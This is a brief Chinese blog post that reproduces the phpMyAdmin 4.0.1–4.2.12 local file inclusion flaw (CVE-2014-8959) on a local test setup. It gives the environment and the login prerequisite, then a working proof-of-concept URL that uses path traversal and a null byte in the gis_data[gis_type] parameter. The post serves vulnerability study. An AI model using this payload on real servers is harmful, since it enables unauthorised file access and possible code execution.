phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)

最近想复现一些漏洞并分析,打算从phpmyadmin开始。


先搭建环境

phpmyadmin版本:4.0.3

php版本:5.2.17


利用条件:

登陆后台(个人感觉鸡肋),需要截断


上级目录下放一个test.txt,内容是

poc:http://localhost/phpmyadmin4.0.3/gis_data_editor.php?token=f10804504871328e0d74658cd0a5c1a2&gis_data[gis_type]=/../../../../test.txt%00

token要随情况变,登录之后有token



PS:等我有了代码审计的能力会再分析

你可能感兴趣的:(phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959))